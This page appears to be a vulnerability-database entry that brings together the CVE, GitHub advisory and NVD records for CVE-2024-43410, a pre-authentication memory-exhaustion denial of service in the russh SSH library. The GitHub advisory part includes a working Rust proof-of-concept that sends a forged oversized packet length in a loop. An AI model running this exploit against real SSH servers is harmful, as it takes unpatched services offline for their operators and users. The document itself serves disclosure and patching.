cvelistv5 - cve-2024-43410

CVE-2024-43410 (GCVE-0-2024-43410)

Vulnerability from cvelistv5

Published

2024-08-21 15:09

Modified

2024-08-21 15:35

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Summary

Russh is a Rust SSH client & server library. Allocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server. An SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length. After parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later. But this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests. This vulnerability is fixed in 0.44.1.

References

►

URL

Tags

	security-advisories@github.com	https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55	Patch
	security-advisories@github.com	https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	Eugeny	russh	Version: < 0.44.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:russh_project:russh:*:*:*:*:*:rust:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "russh",
            "vendor": "russh_project",
            "versions": [
              {
                "lessThan": "0.44.1",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43410",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-21T15:33:37.660659Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-21T15:35:25.998Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "russh",
          "vendor": "Eugeny",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.44.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Russh is a Rust SSH client \u0026 server library. Allocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server. An SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length.\nAfter parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later. But this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests. This vulnerability is fixed in 0.44.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-08-21T15:09:34.316Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg"
        },
        {
          "name": "https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55"
        }
      ],
      "source": {
        "advisory": "GHSA-vgvv-x7xg-6cqg",
        "discovery": "UNKNOWN"
      },
      "title": "Russh has an OOM Denial of Service due to allocation of untrusted amount"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-43410",
    "datePublished": "2024-08-21T15:09:34.316Z",
    "dateReserved": "2024-08-12T18:02:04.967Z",
    "dateUpdated": "2024-08-21T15:35:25.998Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-43410\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-21T16:15:08.373\",\"lastModified\":\"2025-08-13T18:32:43.660\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Russh is a Rust SSH client \u0026 server library. Allocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server. An SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length.\\nAfter parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later. But this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests. This vulnerability is fixed in 0.44.1.\"},{\"lang\":\"es\",\"value\":\"Russh es una librer\u00eda de servidor y cliente Rust SSH. La asignaci\u00f3n de una cantidad de memoria que no es de confianza permite que cualquier usuario no autenticado utilice OOM en un servidor russh. Un paquete SSH consta de una longitud big-endian de 4 bytes, seguida de un flujo de bytes de esta longitud. Despu\u00e9s de analizar y potencialmente descifrar la longitud de 4 bytes, russh asigna suficiente memoria para este flujo de bytes, como optimizaci\u00f3n del rendimiento para evitar reasignaciones posteriores. Pero esta longitud no es de confianza y el cliente puede establecerla en cualquier valor, lo que provoca que se asigne tanta memoria, lo que provocar\u00e1 que el proceso entre en OOM dentro de unas pocas solicitudes de este tipo. Esta vulnerabilidad se solucion\u00f3 en 0.44.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:russh_project:russh:*:*:*:*:*:rust:*:*\",\"versionEndExcluding\":\"0.44.1\",\"matchCriteriaId\":\"9D88D02C-22D3-4C01-BEB7-BA3967189488\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:warpgate_project:warpgate:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.10.2\",\"matchCriteriaId\":\"F311333F-14EB-455B-BCC0-9654E39CBA0E\"}]}]}],\"references\":[{\"url\":\"https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-43410\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-21T15:33:37.660659Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:russh_project:russh:*:*:*:*:*:rust:*:*\"], \"vendor\": \"russh_project\", \"product\": \"russh\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"0.44.1\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-21T15:35:19.570Z\"}}], \"cna\": {\"title\": \"Russh has an OOM Denial of Service due to allocation of untrusted amount\", \"source\": {\"advisory\": \"GHSA-vgvv-x7xg-6cqg\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Eugeny\", \"product\": \"russh\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.44.1\"}]}], \"references\": [{\"url\": \"https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg\", \"name\": \"https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55\", \"name\": \"https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Russh is a Rust SSH client \u0026 server library. Allocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server. An SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length.\\nAfter parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later. But this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests. This vulnerability is fixed in 0.44.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-08-21T15:09:34.316Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-43410\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-21T15:35:25.998Z\", \"dateReserved\": \"2024-08-12T18:02:04.967Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-21T15:09:34.316Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-vgvv-x7xg-6cqg

Vulnerability from github

Published

2024-08-14 21:18

Modified

2024-08-21 18:59

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

Russh has an OOM Denial of Service due to allocation of untrusted amount

Details

Summary

Allocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server.

Details

An SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length. After parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later.

https://github.com/Eugeny/russh/blob/4eaa080e7532662023f75e8fff45b743fe607f8c/russh/src/cipher/mod.rs#L254

But this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests.

RFC 4253 contains an explicit section on packet length limits: https://datatracker.ietf.org/doc/html/rfc4253#section-6.1

However, implementations SHOULD check that the packet length is reasonable in order for the implementation to avoid denial of service and/or buffer overflow attacks.

PoC

Running the echoserver example on port 2222 (cd russh && cargo run --release --example echoserver), the provided Rust program can be executed against this echoserver and will cause it to OOM within a few tries.

Rust code to run against the echo server `Cargo.toml` ```toml [package] name = "poc" version = "0.1.0" edition = "2021" [dependencies] hex-literal = "=0.4.1" ``` `main.rs` ```rust use std::time::Duration; use std::{error::Error, net::SocketAddr}; use std::{ io::{Read, Write}, net::TcpStream, }; fn main() -> Result<(), Box> { loop { attempt()?; eprintln!("still running, trying again in a few seconds"); std::thread::sleep(Duration::from_secs(2)); } } fn attempt() -> Result<(), Box> { for i in 0..5 { eprintln!("iteration {i}"); let mut s = TcpStream::connect("0.0.0.0:2222".parse::().unwrap())?; s.write_all(b"SSH-2.0-OpenSSH_9.7\r\n")?; s.read(&mut [0; 1000])?; // A KeyExchangeInit copied from an OpenSSH client run but the length has been replaced with 0xFFFFFF00. s.write_all(&hex_literal::hex!( " ffffff00071401af35150e67f2bc6dc4bc6b5330901900000131736e74727570373631783235353 1392d736861353132406f70656e7373682e636f6d2c637572766532353531392d7368613235362c 637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6 e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e69 7374703532312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686 13235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669 652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2 d67726f757031342d7368613235362c6578742d696e666f2d632c6b65782d7374726963742d632d 763030406f70656e7373682e636f6d000001cf7373682d656432353531392d636572742d7630314 06f70656e7373682e636f6d2c65636473612d736861322d6e697374703235362d636572742d7630 31406f70656e7373682e636f6d2c65636473612d736861322d6e697374703338342d636572742d7 63031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703532312d63657274 2d763031406f70656e7373682e636f6d2c736b2d7373682d656432353531392d636572742d76303 1406f70656e7373682e636f6d2c736b2d65636473612d736861322d6e697374703235362d636572 742d763031406f70656e7373682e636f6d2c7273612d736861322d3531322d636572742d7630314 06f70656e7373682e636f6d2c7273612d736861322d3235362d636572742d763031406f70656e73 73682e636f6d2c7373682d656432353531392c65636473612d736861322d6e697374703235362c6 5636473612d736861322d6e697374703338342c65636473612d736861322d6e697374703532312c 736b2d7373682d65643235353139406f70656e7373682e636f6d2c736b2d65636473612d7368613 22d6e69737470323536406f70656e7373682e636f6d2c7273612d736861322d3531322c7273612d 736861322d3235360000006c63686163686132302d706f6c7931333035406f70656e7373682e636 f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c61657331 32382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636 f6d0000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c61657331 32382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d4 06f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d000000d575 6d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656 e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c68 6d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d6 5746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d6163 2d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d7368613 22d3531322c686d61632d73686131000000d5756d61632d36342d65746d406f70656e7373682e63 6f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d323 5362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f7065 6e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632 d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61 632d736861322d3235362c686d61632d736861322d3531322c686d61632d736861310000001a6e6 f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c69620000001a6e6f6e652c7a6c6962406f 70656e7373682e636f6d2c7a6c69620000000000000000000000000000000000000000 " ))?; s.shutdown(std::net::Shutdown::Both)?; } Ok(()) } ```

Impact

Due to this allocation, a russh server can be brought to OOM, causing a DoS. Since this happens before authentication, it can be done by any user that has access to the TCP port over the internet.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.44.0"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "russh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.44.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-43410"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-14T21:18:20Z",
    "nvd_published_at": "2024-08-21T16:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAllocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server.\n\n### Details\n\nAn SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length.\nAfter parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later.\n\nhttps://github.com/Eugeny/russh/blob/4eaa080e7532662023f75e8fff45b743fe607f8c/russh/src/cipher/mod.rs#L254\n\nBut this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests.\n\nRFC 4253 contains an explicit section on packet length limits: https://datatracker.ietf.org/doc/html/rfc4253#section-6.1\n\n\u003e However, implementations SHOULD check that the packet length is reasonable in order for the implementation to avoid denial of service and/or buffer overflow attacks.\n\n### PoC\n\nRunning the `echoserver` example on port 2222 (`cd russh \u0026\u0026 cargo run --release --example echoserver`), the provided Rust program can be executed against this echoserver and will cause it to OOM within a few tries.\n\n\u003cdetails\u003e\n\u003csummary\u003eRust code to run against the echo server\u003c/summary\u003e\n\n`Cargo.toml`\n```toml\n[package]\nname = \"poc\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n[dependencies]\nhex-literal = \"=0.4.1\"\n```\n\n`main.rs`\n```rust\nuse std::time::Duration;\nuse std::{error::Error, net::SocketAddr};\n\nuse std::{\n    io::{Read, Write},\n    net::TcpStream,\n};\n\nfn main() -\u003e Result\u003c(), Box\u003cdyn Error\u003e\u003e {\n    loop {\n        attempt()?;\n        eprintln!(\"still running, trying again in a few seconds\");\n        std::thread::sleep(Duration::from_secs(2));\n    }\n}\n\nfn attempt() -\u003e Result\u003c(), Box\u003cdyn Error\u003e\u003e {\n    for i in 0..5 {\n        eprintln!(\"iteration {i}\");\n        let mut s = TcpStream::connect(\"0.0.0.0:2222\".parse::\u003cSocketAddr\u003e().unwrap())?;\n        s.write_all(b\"SSH-2.0-OpenSSH_9.7\\r\\n\")?;\n        s.read(\u0026mut [0; 1000])?;\n        // A KeyExchangeInit copied from an OpenSSH client run but the length has been replaced with 0xFFFFFF00.\n        s.write_all(\u0026hex_literal::hex!(\n            \"\n        ffffff00071401af35150e67f2bc6dc4bc6b5330901900000131736e74727570373631783235353\n        1392d736861353132406f70656e7373682e636f6d2c637572766532353531392d7368613235362c\n        637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6\n        e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e69\n        7374703532312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686\n        13235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669\n        652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2\n        d67726f757031342d7368613235362c6578742d696e666f2d632c6b65782d7374726963742d632d\n        763030406f70656e7373682e636f6d000001cf7373682d656432353531392d636572742d7630314\n        06f70656e7373682e636f6d2c65636473612d736861322d6e697374703235362d636572742d7630\n        31406f70656e7373682e636f6d2c65636473612d736861322d6e697374703338342d636572742d7\n        63031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703532312d63657274\n        2d763031406f70656e7373682e636f6d2c736b2d7373682d656432353531392d636572742d76303\n        1406f70656e7373682e636f6d2c736b2d65636473612d736861322d6e697374703235362d636572\n        742d763031406f70656e7373682e636f6d2c7273612d736861322d3531322d636572742d7630314\n        06f70656e7373682e636f6d2c7273612d736861322d3235362d636572742d763031406f70656e73\n        73682e636f6d2c7373682d656432353531392c65636473612d736861322d6e697374703235362c6\n        5636473612d736861322d6e697374703338342c65636473612d736861322d6e697374703532312c\n        736b2d7373682d65643235353139406f70656e7373682e636f6d2c736b2d65636473612d7368613\n        22d6e69737470323536406f70656e7373682e636f6d2c7273612d736861322d3531322c7273612d\n        736861322d3235360000006c63686163686132302d706f6c7931333035406f70656e7373682e636\n        f6d2c6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c61657331\n        32382d67636d406f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636\n        f6d0000006c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c61657331\n        32382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d4\n        06f70656e7373682e636f6d2c6165733235362d67636d406f70656e7373682e636f6d000000d575\n        6d61632d36342d65746d406f70656e7373682e636f6d2c756d61632d3132382d65746d406f70656\n        e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c68\n        6d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861312d6\n        5746d406f70656e7373682e636f6d2c756d61632d3634406f70656e7373682e636f6d2c756d6163\n        2d313238406f70656e7373682e636f6d2c686d61632d736861322d3235362c686d61632d7368613\n        22d3531322c686d61632d73686131000000d5756d61632d36342d65746d406f70656e7373682e63\n        6f6d2c756d61632d3132382d65746d406f70656e7373682e636f6d2c686d61632d736861322d323\n        5362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322d65746d406f7065\n        6e7373682e636f6d2c686d61632d736861312d65746d406f70656e7373682e636f6d2c756d61632\n        d3634406f70656e7373682e636f6d2c756d61632d313238406f70656e7373682e636f6d2c686d61\n        632d736861322d3235362c686d61632d736861322d3531322c686d61632d736861310000001a6e6\n        f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c69620000001a6e6f6e652c7a6c6962406f\n        70656e7373682e636f6d2c7a6c69620000000000000000000000000000000000000000\n        \"\n        ))?;\n\n        s.shutdown(std::net::Shutdown::Both)?;\n    }\n    Ok(())\n}\n```\n\n\u003c/details\u003e\n\n### Impact\n\nDue to this allocation, a russh server can be brought to OOM, causing a DoS.\nSince this happens before authentication, it can be done by any user that has access to the TCP port over the internet.",
  "id": "GHSA-vgvv-x7xg-6cqg",
  "modified": "2024-08-21T18:59:23Z",
  "published": "2024-08-14T21:18:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43410"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Eugeny/russh"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Russh has an OOM Denial of Service due to allocation of untrusted amount"
}

fkie_cve-2024-43410

Vulnerability from fkie_nvd

Published

2024-08-21 16:15

Modified

2025-08-13 18:32

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

▶	URL	Tags
	security-advisories@github.com	https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55	Patch
	security-advisories@github.com	https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	russh_project	russh	*
	warpgate_project	warpgate	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:russh_project:russh:*:*:*:*:*:rust:*:*",
              "matchCriteriaId": "9D88D02C-22D3-4C01-BEB7-BA3967189488",
              "versionEndExcluding": "0.44.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:warpgate_project:warpgate:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F311333F-14EB-455B-BCC0-9654E39CBA0E",
              "versionEndExcluding": "0.10.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Russh is a Rust SSH client \u0026 server library. Allocating an untrusted amount of memory allows any unauthenticated user to OOM a russh server. An SSH packet consists of a 4-byte big-endian length, followed by a byte stream of this length.\nAfter parsing and potentially decrypting the 4-byte length, russh allocates enough memory for this bytestream, as a performance optimization to avoid reallocations later. But this length is entirely untrusted and can be set to any value by the client, causing this much memory to be allocated, which will cause the process to OOM within a few such requests. This vulnerability is fixed in 0.44.1."
    },
    {
      "lang": "es",
      "value": "Russh es una librer\u00eda de servidor y cliente Rust SSH. La asignaci\u00f3n de una cantidad de memoria que no es de confianza permite que cualquier usuario no autenticado utilice OOM en un servidor russh. Un paquete SSH consta de una longitud big-endian de 4 bytes, seguida de un flujo de bytes de esta longitud. Despu\u00e9s de analizar y potencialmente descifrar la longitud de 4 bytes, russh asigna suficiente memoria para este flujo de bytes, como optimizaci\u00f3n del rendimiento para evitar reasignaciones posteriores. Pero esta longitud no es de confianza y el cliente puede establecerla en cualquier valor, lo que provoca que se asigne tanta memoria, lo que provocar\u00e1 que el proceso entre en OOM dentro de unas pocas solicitudes de este tipo. Esta vulnerabilidad se solucion\u00f3 en 0.44.1."
    }
  ],
  "id": "CVE-2024-43410",
  "lastModified": "2025-08-13T18:32:43.660",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-08-21T16:15:08.373",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/Eugeny/russh/commit/f660ea3f64b86d11d19e33076012069f02431e55"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Eugeny/russh/security/advisories/GHSA-vgvv-x7xg-6cqg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-43410 (GCVE-0-2024-43410)

Vulnerability from cvelistv5

ghsa-vgvv-x7xg-6cqg

Vulnerability from github

Summary

Details

PoC

Impact

fkie_cve-2024-43410

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature